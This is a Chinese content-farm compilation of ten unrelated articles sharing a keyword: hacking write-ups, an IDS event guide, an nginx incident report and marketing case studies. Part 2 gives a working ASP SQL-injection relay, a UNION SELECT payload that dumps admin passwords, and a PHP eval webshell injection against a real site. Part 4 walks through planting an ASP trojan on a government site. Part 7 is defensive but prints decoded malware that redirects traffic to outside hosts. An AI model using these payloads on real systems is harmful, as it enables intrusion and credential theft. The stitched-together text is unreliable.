0day交易网成功入侵事件

时间:2023年03月29日

/

来源:MissNana

/

编辑:本站小编

收藏本文

下载本文

下面就是小编给大家带来的0day交易网成功入侵事件,本文共10篇,希望能帮助到大家!本文原稿由网友“MissNana”提供。

篇1:0day交易网成功入侵事件

1:扫描Exploithub.com网站

2:发现blog WordPress 缺失wp-config.php www.exploithub.com/blog/ –》重新安装了该blog

3:上传shell级的phpinfo

4:备份所有文件和数据库,并且进行下载操作

篇2:实例入侵一游戏交易网

在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程

一: 踩点 收集信息

因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握

服务器上13个站点,大多数站点很安全,因为第一渗透的时候,是由

www.shanXXX.XX  这个站进入的

我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,

由后台看出这个站的程序是RAICO_V1[1].2_CS

直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵

二: 漏洞在哪里?它在灯火阑珊处

这个程序的漏洞文件是在post_task_review.php

由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,

首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件

内容如下

<%

JmdcwName=request(“id”)

' 注入中转站 POST 版,BY 寂寞的刺猬 [L.S.T]

JmStr=“task_subject=111&task_endday=1&task_starttime=-06-13+05%3A25%3A30&task_money=1&task_desc=1&addsubmit=%D4%A4%C0%C0&kind_id=”&JmdcwName

JMUrl=“www.shanXXX.XX/post_task_review.php”

JmRef=“www.shanXXX.XX/post_task.php”

JmCok=“__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3”

JmStr=URLEncoding(JmStr)

response.write  PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)

Dim Http

Set Http = Server.CreateObject(“msxml2.serverXMLHTTP”)

With Http

.Open “POST”,PostUrl,False

.SetRequestHeader “Content-Length”,Len(PostStr)

.SetRequestHeader “Content-Type”,“application/x-www-form-urlencoded”

.SetRequestHeader “Referer”,PostRef

.SetRequestHeader “Cookie”,PostCok

.Send PostStr

PostData = .ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = “”

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn, I + 1, 1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

I = I + 1

End If

Next

bytes2BSTR = strReturn

End Function

Function URLEncoding(vstrin)

strReturn=“”

Dim i

For i=1 To Len(vstrin)

ThisChr=Mid(vstrin,i,1)

if Abs(Asc(ThisChr))< &HFF Then

strReturn=strReturn & ThisChr

Else

InnerCode=Asc(ThisChr)

If InnerCode<0 Then

InnerCode=InnerCode + &H10000

End If

Hight1=(InnerCode And &HFF00) \\&HFF

Low1=InnerCode And &HFF

strReturn=strReturn & “%” & Hex(Hight1) & “%” & Hex(Low1)

End if

Next

strReturn=Replace(strReturn,chr(32),“%20”) '转换空格,如果网站过滤了空格,尝试用/**/来代替%20

strReturn=Replace(strReturn,chr(43),“%2B”)  'JMDCW增加转换+字符

'strReturn=Replace(strReturn,过滤字符,“转换为字符”)  '在此增加要过滤的代码

URLEncoding=strReturn

End Function

%>

之后浏览地址为localhost/jmpost.asp?id=1107%20and%201=2%20union%20select%20-1,concat(admin_name,admin_pw)%20from%20rco_admin/* 就可以直接爆出管理员的用户名和密码 如图2[attach]3281[/attach]

三: 获取webshell  拿到目标站的路径.

登陆后台

,只能上传图片,抓包上传,截断 ,未能实现.

但是后台的配置那可以插一句话

a'“;@eval($_POST[cmd]);//

写进去本来是site=”a\\'“;@eval”

但是过滤了'

就成了site=“a”;@eval;//“

这样成功的闭合了前面的双引,把后面的双引注释掉了.中间的;@eval($_POST[cmd]);就可以执行了.

把a'”;@eval($_POST[cmd]);// 写进去就保存到一个文件里了.

这个文件被所有的文件包含.

所以我们直接同一句话连接端连接网站的任何一个文件都可以获得webshell.

直接传php没传上去,所以把php马改成jpg格式的,之后在一句话连接端中修改成php的

顺利拿到webshell,linux的服务器

执行 cat /etc/password 获得目标站的路径,如图6[attach]3285[/attach]

直接跳转到目标站的目录, 全是0644,尝试过提权 但是反弹不了,后来才知道是服务器连不上网.

搞到这里,应该是大功告成了,传马,ok!

四:意外情况,不是意外收获.

上传木马成功,惊喜之余,去访问shell地址,

错误 Not Found.

经验告诉我,可能是换了服务器,因为这样的游戏站基本上都是变态,被搞一次,安全性就加大N倍,很黄,很强大.

篇3:科讯科技0day入侵实例(图)

现在程序在不断的发展,更新,漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell.在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户名后,可以自动检查您想要的用户名是否已经被别人注册)

现在程序在不断的发展,更新。漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell.在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户名后,可以自动检查您想要的用户名是否已经被别人注册)

我们今天就拿第一个来演示,目标地址为(www.**.**.gov.cn) 图1

500)this.width=500“ title=”点击这里用新窗口浏览图片“ />

因为漏洞出在头像上传的地方,所以第一步,我们的先 注册一个用户,

再在用户上传头像那里上传我们的ASP木马。已经写好了一个现成的科讯科技的漏洞利用工具。工具使用很简单。傻瓜化。图2

500)this.width=500” title=“点击这里用新窗口浏览图片” />

工具上有6个点击连接。

1.用户注册。2.头像上传。3修改目录拿WebShell.4.查看WebShell地址。5.程序的默认数据库下载。6读取程序的CONN文件把网站复制进去点击-打开-注册用户。图3

500)this.width=500“ title=”点击这里用新窗口浏览图片“ />

上一页12 3 下一页

篇4:科讯科技0day入侵演示网站安全

现在程序在不断的发展,更新,漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell.在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户名后,可以自动检查您想要的用户名是否已经被别人注册)

我们今天就拿第一个来演示,目标地址为(www.**.**.gov.cn) 图1

因为漏洞出在头像上传的地方,所以第一步,我们的先 注册一个用户。再在用户上传头像那里上传我们的ASP木马。已经写好了一个现成的科讯科技的漏洞利用工具。工具使用很简单。傻瓜化。图2

工具上有6个点击连接。

1.用户注册。2.头像上传。3修改目录拿WebShell.4.查看WebShell地址。5.程序的默认数据库下载。6读取程序的CONN文件把网站复制进去点击-打开-注册用户。图3

注册好了以后点击-头像上传,

上传我们的ASP木马,把后缀改为,JPG或者GIF。图4

上传好后点击-修改目录拿WebShell。会在www.qf.lg.gov.cn/Upfiles/User/xiaozi目录下生成一个为X.ASP的文件,而在X.ASP这个文件下就是你的图片大马。图5

直接点击-查看WebShell地址,在X.ASP的目录下就可以查看到我们的GIF木马的地址。 图6

点击-浏览就就能查看到我们图片木马的绝对途径。 图7

然后用我们的一句话木马连接。 图8

传我们免杀的ASP木马后成功得到WebShell. 图9

不知道大家看完后想起来什么没有?

其实这个漏洞跟动易的注册漏洞差不了多少。

漏洞演示到此为止。提权留给大家自己去领悟。

篇5:十大入侵检测系统高风险事件及其对策

事件1 Windows /XP RPC服务远程拒绝服务攻击

漏洞存在于Windows系统的DCE-RPC堆栈实现中,远程攻击者可以连接TCP 135端口,发送畸形数据,可导致关闭RPC服务,关闭RPC服务可以引起系统停止对新的RPC请求进行响应,产生拒绝服务。

[对策]

1、临时处理方法:使用防火墙或Windows系统自带的TCP/IP过滤机制对TCP 135端口进行限制,限制外部不可信任主机的连接。

2、彻底解决办法:打安全补丁。

事件2 Windows系统下MSBLAST(冲击波)蠕虫传播

感染蠕虫的计算机试图扫描感染网络上的其他主机,消耗主机本身的资源及大量网络带宽,造成网络访问能力急剧下降。

[对策]

1、下载完补丁后断开网络连接再安装补丁。

2、清除蠕虫病毒。

事件3 Windows系统下Sasser(震荡波)蠕虫传播

蠕虫攻击会在系统上留下后门并可能导致Win 2000/XP操作系统重启,蠕虫传播时可能导致被感染主机系统性能严重下降以及被感染网络带宽被大量占用。

[对策]

1、首先断开计算机网络。

2、然后用专杀工具查杀毒。

3、最后打系统补丁。

事件5 TELNET服务用户认证失败

TELNET服务往往是攻击者入侵系统的渠道之一。大多数情况下,合法用户在TELNET登录过程中会认证成功。如果出现用户名或口令无效等情况,TELNET服务器会使认证失败。如果登录用户名为超级用户,则更应引起重视,检查访问来源是否合法。如果短时间内大量出现TELNET认证失败响应,则说明主机可能在遭受暴力猜测攻击。

[对策]

1、检查访问来源的IP、认证用户名及口令是否符合安全策略。

2、密切关注FTP客户端大量失败认证的来源地址的活动,如果觉得有必要,可以暂时禁止此客户端源IP地址的访问。

事件6 TELNET服务用户弱口令认证

攻击者可能利用扫描软件或人工猜测到TELNET服务的弱口令从而非法获得FTP服务的访问,也可能结合TELNET服务器的本地其他漏洞获取主机的控制权。

[对策]

1、提醒或强制相关的TELNET服务用户设置复杂的口令,

2、设置安全策略,定期强制用户更改自己的口令。

事件7 Microsoft SQL 客户端SA用户默认空口令连接

Microsoft SQL数据库默认安装时存在sa用户密码为空的问题,远程攻击者可能利用这个漏洞登录到数据库服务器对数据库进行任意操作。更危险的是由大多数MS-SQL的安装采用集成Windows系统认证的方式,远程攻击者利用空口令登录到SQL服务器后,可以利用MS-SQL的某些转储过程如xp_cmdshell等以LocalSystem的权限在主机上执行任意命令,从而取得主机的完全控制。

[对策]

1、系统的安全模式尽量使用“Windows NT only”模式,这样只有信任的计算机才能连上数据库。

2、为sa账号设置一个强壮的密码;

3、不使用TCP/IP网络协议,改用其他网络协议。

4、如果使用TCP/IP网络协议,最好将其默认端口1433改为其他端口,这样攻击者用扫描器就不容易扫到。

事件8 POP3服务暴力猜测口令攻击

POP3服务是常见网络邮件收取协议。

发现大量的POP3登录失败事件,攻击者可能正在尝试猜测有效的POP3服务用户名和口令,如果成功,攻击者可能利用POP3服务本身漏洞或结合其他服务相关的漏洞进一步侵害系统,也可能读取用户的邮件,造成敏感信息泄露。

[对策]

密切留意攻击来源的进一步活动,如果觉得有必要阻塞其对服务器的连接访问。

事件9 POP3服务接收可疑病毒邮件

当前通过邮件传播的病毒、蠕虫日益流行,其中一些邮件病毒通过发送带有可执行的附件诱使用户点击执行来传播,常见的病毒附件名后缀有:.pif、.scr、.bat、.cmd、.com ,带有这些后缀文件名附件的邮件通常都是伪装成普通邮件的病毒邮件。

邮件病毒感染了主机以后通常会向邮件客户端软件中保存的其他用户邮件地址发送相同的病毒邮件以扩大传染面。

此事件表示IDS检测到接收带可疑病毒附件邮件的操作,邮件的接收者很可能会感染某种邮件病毒,需要立即处理。

[对策]

1、通知隔离检查发送病毒邮件的主机,使用杀毒软件杀除系统上感染的病毒。

2、在邮件服务器上安装病毒邮件过滤软件,在用户接收之前就杀除之。

事件10 Microsoft Windows LSA服务远程缓冲区溢出攻击

Microsoft Windows LSA是本地安全授权服务(LSASRV.DLL)。

LSASS DCE/RPC末端导出的Microsoft活动目录服务存在一个缓冲区溢出,远程攻击者可以利用这个漏洞以SYSTEM权限在系统上执行任意指令。

[对策]

1、临时处理方法:使用防火墙对UDP端口135、137、138、445及TCP端口135、139、445、593进行过滤。

2、打系统补丁、升级。

篇6:如何成功运作事件营销

现今,产品品牌越来越多,要想占有一席之地的产品必定有之特有的品牌诉求来打动目标消费群,进而形成实质性的购买行为,但随之而来的便是许多品牌在各种媒体中的噪音干扰度也越来越大,从而降低了品牌注目率,尤其是一些中小型品牌在这样恶劣的环境中,要想获得更多的品牌接触度更是难上加难。再加上众多品牌商只靠自己一厢情愿的诉求,让品牌内涵显得单调苍白,受众自然就无法从精神层面去认同,因此往往达不到预期的效果。由此可见现今品牌诉求面临两个问题:1、媒体噪音干扰度高,造成品牌注目率低;2、一厢情愿的品牌内涵诉求,使得目标顾客无法从内心真正认同。问题往往与解决方法同时产生,试想如果在品牌诉求方式中加入体验和互动两个因素,并形成某一特定事件,这样使受众从行为和情感上去主动认同品牌诉求,这样的诉求效果就要比单纯的口号要有效得多,这其实便是事件营销。但如何形成这一特定事件,并把这一事件的主题内涵与品牌诉求结合呢?在运作事件营销过程中需要注意哪些关键要素以达到预期目的呢?本文试从这几个问题来探讨事件营销,并通过一个实际操作的案例来论证以上观点。

透彻理解一个概念往往从最基本的定义中便可以获知。因此首先必须清楚事件营销的一般定义,事件营销(event marketing)是指企业通过策划、组织和利用具有名人效应、新闻价值以及社会影响的人物或事件,引起媒体、社会团体和消费者的兴趣与关注,以求提高企业或产品的知名度、美誉度,树立良好品牌形象,并最终促成产品或服务的销售目的的手段和方式。从这个概念我们可以得出这几点信息:1、运作事件营销具有两种方式:主动策划和借力利用,且这两种方式可以通过主题相关性进行相互转化(这可以称为第三种方式);2、事件营销的特征:具有相关性、公共性、新闻性、参与体验性和趣味性。3、事件营销的目的:提高销售和增强品牌度。下面将详细分析以上得出的信息要点。

首先可以回答第一个问题,即如何形成某一特定事件。主要通过两种方式:主动策划和借力利用,

主动策划是指组织主动设计一系列符合自身定位的方案,通过各种方式传播,使之成为公众所关注的公共热点;借力利用是指组织将自身的定位诉求向社会热点话题靠拢,通过相关性(可以是形式上的,也可以是内涵上的相关)实现公众对热点话题的关注向组织定位诉求的关注相融合。

由此显而易见的是形成的这一特定事件必须具备相关性特征,即无论是主动策划还是借力利用都必须让该事件诉求与自身定位具有强相关性,这种相关性往往会被凝结成一个主题,且贯穿于整个事件中,而不是生搬硬套、强行嫁接的。

其次,该事件要让更多的媒体、受众关注,需要具备公共性和新闻性这两个特征。公共性是指该事件内容的影响程度。判断公共性与否的标准主要看其对社会产生影响的程度。一般来说,对越多的人产生影响,公共性就越大,该事件的价值就越大;新闻性从某种意义上说就是让该事件成为新闻,当一个事件发生之后,其本身是否具备新闻价值就决定了它能否以某一形式在部分人群中进行一定范围的传播。当该事件具备较大的新闻价值,且以新闻的形式来向公众展现,形成类似软文的新闻题材,这样的事件就具有了很高的价值。

如果让媒体和受众只是关注,只能说完成了第一步,要是组织策划的事件能与某一特定群体进行参与或者体验(可以是行为,也可以是情感上的体验),可以避免只靠单一品牌诉求的自言自语的尴尬,因此设置的事件话题必须可参或可体验。

最后便是趣味性,趣味是让该事件能使受众感到一定新奇、反常、认同,使之对该事件产生兴趣,进而促进关注并参与。趣味性可以理解为参与和体验的催化剂。

从事件营销的目的上来看,事件营销其实仅仅是销售促进(promot)的一种方式,因此具备增加销售的基本功能,但事件营销往往是从品牌内涵与事件的内涵上相交互的,因此对品牌的形象和美誉度会得到提升,这比纯粹的提升销量显得更具持久,并对品牌的形象塑造和归属感具有长远的意义。

由此,便可以得出本文开篇提出的几个问题的解决方法了,但值得一提的是设计的事件必须与品牌自身的诉求具有强相关性,否则就有生搬硬套的感觉,进而达不到预期目的。以下将通过某地级市A品牌啤酒的案例来展示该品牌啤酒如何借助世博会这一事件,针对该地级市场运作的一个事件营销的成功案例。

篇7:由于Nginx漏洞导致的入侵事件WEB安全

服务器突然负载比平常高出了50%,经过长时间分析发现原来是 利用nginx的一个漏洞,通过图片上传了含有代码的图片,然后调用图片使用post传入代码,生成一个含有推广链接代码的php可执行文件,代码在调用时需要多次解密,因此直接导致负载升高,

起因:

今天早上来到公司照例打开cacti监控查看服务器的运行情况,突然发现两台网站服务器的负载比平时高了50%,这个主要从CPU的使用情况以及服务器的load值来看。

排查:

于是赶紧登录到服务器上使用top命令查看,发现是一些php-fpm的进程瞬间占用了大量的CPU,奇怪,平时那些php-fpm的进程占用CPU很少超过2%的,今天怎么有的会达到100%,于是赶紧咨询运维的同事昨天是不是有程序发布到正式环境。同事回答却是有,发布时间为19:48左右,对照cacti的查看,发现负载升高是在凌晨3点中左右,因此可以初步确认发布和负载升高没什么直接的关系。

那么到底是什么导致服务器的负载一下子升高了那么多呢?带着这个疑问,我开始采用linux下的一些命令行工具开始排查,过程如下:

首先查看进程是否打开什么文件,找到进程高的pid,cat /proc/pid/fd 没有发现有打开的文件,接着采用strace –p pid跟踪相应的占用cpu高的php-fpm进程,也很难发现问题,因为占用CPU高的进程不是一直占用CPU高,而是瞬间的,所以很难跟踪。然后采用lsof命令查看相应的占用CPU高的pid,lsof –p pid ,发现路径都是指向bbs根目录下,因此初步确定bbs根目录必定有蹊跷。

目前可以确定的是bbs根目录和这次的负载高有直接的联系,那么如何找到其中的联系呢?我的思路是想找出是什么php文件引起的,也就是php-fpm进程是调用的哪个PHP文件的时候会出现负载突然升高的情况呢?请教了几个高手都不清楚,在网上找了半天也没找到合适的答案,突然想起前段时间出现类似的木马事件,也是导致服务器负载高了很多,上次木马事件是因为nginx一个文件上传的漏洞导致,并且为了防止此类事情的发生已经写了一个专门检测php文件的脚本,采用对文件进行md5的形式,如果现在的文件的md5和原始文件不匹配就会发短信和邮件报警。同时也开启了nginx上post日志,会记录用户执行post操作的内容。似乎突然来了灵感,赶紧运行了那个文件检测脚本,发现一个forums.php异常,服务器上本来不存在这个文件的,攻击者为了隐藏其链接,对该文件中的代码做了30多次的加密封装,通过开发同事的协助解密该文件后发现如下内容:

error_reporting(E_ERROR);

$domain=$_SERVER['SERVER_NAME'];

$dddd = $_SERVER['PHP_SELF'];

$qqqq=$_SERVER[”QUERY_STRING“];

$filename = end(explode('/',$dddd));

if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/'))

Header(”Location: jump.1310.net/jump.php?“.$_SERVER['HTTP_REFERER']);

else if(stristr($_SERVER['HTTP_REFERER'],'google.com.hk/search?'))

Header(”Location: jump.1310.net/jump.php?“.$_SERVER['HTTP_REFERER']);

else if(stristr($_SERVER['HTTP_REFERER'],'soso.com/q?'))

Header(”Location: jump.1310.net/jump.php?“.$_SERVER['HTTP_REFERER']);

else

{

if($qqqq==”“)

{

$a=”“.$domain.$_SERVER['PHP_SELF'];

$show = file_get_contents('localtemp.665203.com/server.php?gid='.rand(1,0).'&domain='.$domain.'&filename='.$filename.'&url='.$a);

echo $show;

}

else

{

$qqqq=str_replace('&',”“,$qqqq);

$a=”“.$domain.$_SERVER['PHP_SELF'].”?gid=“.$qqqq;

$show=file_get_contents('localtemp.665203.com/server.php?gid='.$qqqq.”&domain=\".$domain.'&filename='.$filename.'&url='.$a);

echo $show;

}

}

?>

很明显,服务器中马了,

将此文件备份后删除,服务器的负载马上降了下来,看来这个文件就是罪魁祸首了。现在知道了是这个文件导致的,那么这个文件是通过什么方式上传上来的呢?如何避免再次被种马,接下来详细分析一下是什么漏洞导致了这次木马事件,如何来预防?

分析:

查看到那个木马文件的更改时间是凌晨的3点零4分,那么这个文件的上传时间可能就是凌晨的3点零4分,带着这个疑问,就去查看服务器网页日志文件,发现了攻击的蛛丝马迹,从日志中显示,该用户是通过上传头像,头像中含有php代码,然后利用Nginx %00空字节执行任意代码(php)漏洞,通过POST /ucenter/data/tmp/upload545562.jpg%00.php的方式,把代码写入到论坛根目录,从sebug.net/vuldb/ssvid-20898查到了该漏洞,nginxnginx 0.5.*、nginx 0.6.*、nginx 0.7 <= 0.7.65、nginx 0.8 <= 0.8.37这些版本都存在这个漏洞,只需要将版本升级到0.8.37以上的版本就能解决,因此将马上将nginx升级至1.0.12版本,问题解决!

经验教训:

通过这次木马事件,有几个教训和心得和大家分享一下: 积极关注服务器的相关安全漏洞,Nginx %00的漏洞去年凌晨的-07-20就出来了,如果关注及时的话此次木马时间完全可以避免。 对所有的程序文件都定期的进行md5校验,当出现不一致的时候检查代码文件,能更快的发现代码文件被改的迹象,减少损失。 对服务器的权限严格控制,如果设置了论坛根目录不能写入,此次攻击也能避免。 加强监控,每天关注服务器的运行情况,对服务器突然的异常保持敏感并马上着手排查。因此以后主要从这三方面来加强web服务器的安全。

篇8:成功的事件营销案例

“对不起体”为2月4日14:18开始,加多宝的官方微博连发了四条主题为“对不起”的微博,并配以幼儿哭泣图片的形式。其隐晦抗议广州中院关于加多宝禁用相关广告词的裁定,加多宝通过微博“喊冤”,一经发出随即引发了上千网友的转发和评论,其中“对不起,是我们无能,卖凉茶可以,打官司不行”被网友们转发次数最多。然而有网友也立即反击,利用同样的格式,做出王老吉的四张“没关系”图片。

品观君点评:加多宝败了官司,赢得了民心,又一次极成功的营销案例。

篇9:成功的事件营销案例

可口可乐换包装卖萌迎合中国市场。在可口可乐瓶子上写着“分享这瓶可口可乐,与你的_________。据不完全统计,目前市场上能见到的“卖萌”可乐共有闺蜜,氧气美女,喵星人,白富美,天然呆,高富帅,邻家女孩,大咔,纯爷们,有为青年,文艺青年,小萝莉,积极分子,粉丝,月光族等十几个品种。

品观君点评:在此80,90后的年代,可口可乐又紧紧的和粉丝走到了一起。

篇10:成功的事件营销案例

猎豹浏览器借着抢票这件事彻底的火爆了,小编在上大一的那年冬天,猎豹浏览器推出了抢票专版,并借着12306这个“比较烂”的网站火了一把。后来的铁道部约谈猎豹浏览器更是一石激起千层浪,这也使得猎豹的市场占有率直线上涨。

品观君点评:事件营销的借势标的可以很多,就看你敢不敢用!

一次入侵检测

网吧入侵文章

事件作文

National Day 国庆节

SLKM入侵初步认识

下载0day交易网成功入侵事件(集锦10篇)
0day交易网成功入侵事件.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
点击下载本文文档